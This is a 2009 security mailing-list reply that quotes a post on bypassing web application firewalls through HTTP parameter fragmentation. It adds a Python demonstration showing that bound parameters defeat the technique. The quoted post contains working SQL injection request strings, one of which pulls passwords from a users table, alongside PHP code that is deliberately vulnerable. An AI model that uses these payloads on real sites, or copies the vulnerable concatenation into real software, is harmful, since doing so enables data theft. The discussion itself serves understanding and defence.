[WEB SECURITY] HTTP parameters fragmentation

Steve Pinkham steve.pinkham at gmail.com
Wed Aug 19 12:10:12 EDT 2009


See http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
for the first formal writeup of these issues I'm aware of.  He used the 
HTTP Parameter Pollution name, which covers both your specific 
fragmentation attack and a few other similar problems (i.e., sometimes 
only the second occurrence is looked at by one part of the system, but 
filters only touch the first part, etc.).  The chart on page 9 shows his 
findings in brief, and I've found it helpful.

Steve

Dmitriy Evteev wrote:
> While preparing an article about WAF bypassing methods, I found an 
> interesting way to bypass filters via HTTP parameters fragmentation.
>
> Vulnerable code example
> 
> Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
>
> The following request doesn’t allow an attack to be conducted
> 
> index.php?a=1+union+select+1,2/*
>
> The following request succeeds using HPF
> 
> index.php?a=1+union/*&b=*/select+1,2
>
> In this case, the SQL request looks like
> 
> select * from table where a=1 union/* and b=*/select 1,2
>
> Another example:
> 
> Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit ".$_GET['c']);
>
> Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." order by ".$_GET['c']." limit 1");
>
> Using HPF (HTTP Parameter Fragmentation), the request succeeds:
> 
> index.php?a=1+union/*&b=*/select+1,2,pass/*&c=*/from+users--
>
> The question is: is there any name for the technique? Please advise me 
> if you know of articles or experts in the field (for example, I found a 
> reference in 
> http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf, 
> page 79).
> 
> Thank you in advance for your help and cooperation!
>
> - - - - - - - - - - - - - - -
> Best Regards, Dmitry Evteev
> Positive Technologies Co.
> Tel.: (495) 744-0144
> Web: http://www.ptsecurity.ru


-- 
  | Steven E. Pinkham                      |
  | GPG public key ID CD31CAFB             |
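
An added example, not part of either message above: it replays the two requests from the quoted post against a constructed per-parameter signature and shows that bound parameters or strict typing stop the fragmented one regardless of the filter. The regex, the `items` table, the function names and the use of SQLite in place of the PHP back end are assumptions made for illustration.

```python
import re
import sqlite3

# Constructed signature of the kind a per-parameter filter might apply (assumption).
SIGNATURE = re.compile(r"union\b.*\bselect", re.I | re.S)

def per_param_filter_blocks(params):
    """True if any single parameter value, inspected alone, matches the signature."""
    return any(SIGNATURE.search(v) is not None for v in params.values())

def make_db():
    """In-memory stand-in for the application's database (constructed sample row)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table items (a integer, b integer)")
    db.execute("insert into items values (1, 5)")
    return db

def concatenated_query(db, params):
    """The quoted post's pattern: values pasted straight into the SQL text."""
    sql = "select * from items where a=" + params["a"] + " and b=" + params["b"]
    return sql, db.execute(sql).fetchall()

def bound_query(db, params):
    """Same query with bound parameters: a value can never become SQL syntax."""
    sql = "select * from items where a=? and b=?"
    return db.execute(sql, (params["a"], params["b"])).fetchall()

def typed_params(params):
    """Strict validation: a and b must be integers, so comment fragments are rejected."""
    return {k: int(v) for k, v in params.items()}

# The two requests from the quoted post, URL-decoded ('+' decodes to a space).
SINGLE = {"a": "1 union select 1,2/*", "b": ""}
FRAGMENTED = {"a": "1 union/*", "b": "*/select 1,2"}

if __name__ == "__main__":
    db = make_db()
    print("single blocked:    ", per_param_filter_blocks(SINGLE))
    print("fragmented blocked:", per_param_filter_blocks(FRAGMENTED))
    sql, rows = concatenated_query(db, FRAGMENTED)
    print("assembled SQL:     ", sql)
    print("signature on SQL:  ", SIGNATURE.search(sql) is not None)
    print("concatenated rows: ", rows)
    print("bound rows:        ", bound_query(db, FRAGMENTED))
    try:
        typed_params(FRAGMENTED)
    except ValueError as exc:
        print("typed validation:   rejected:", exc)
```

The signature only matches once the fragments are joined, which is why inspection has to happen on the assembled value or, better, be made unnecessary by binding the parameters.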
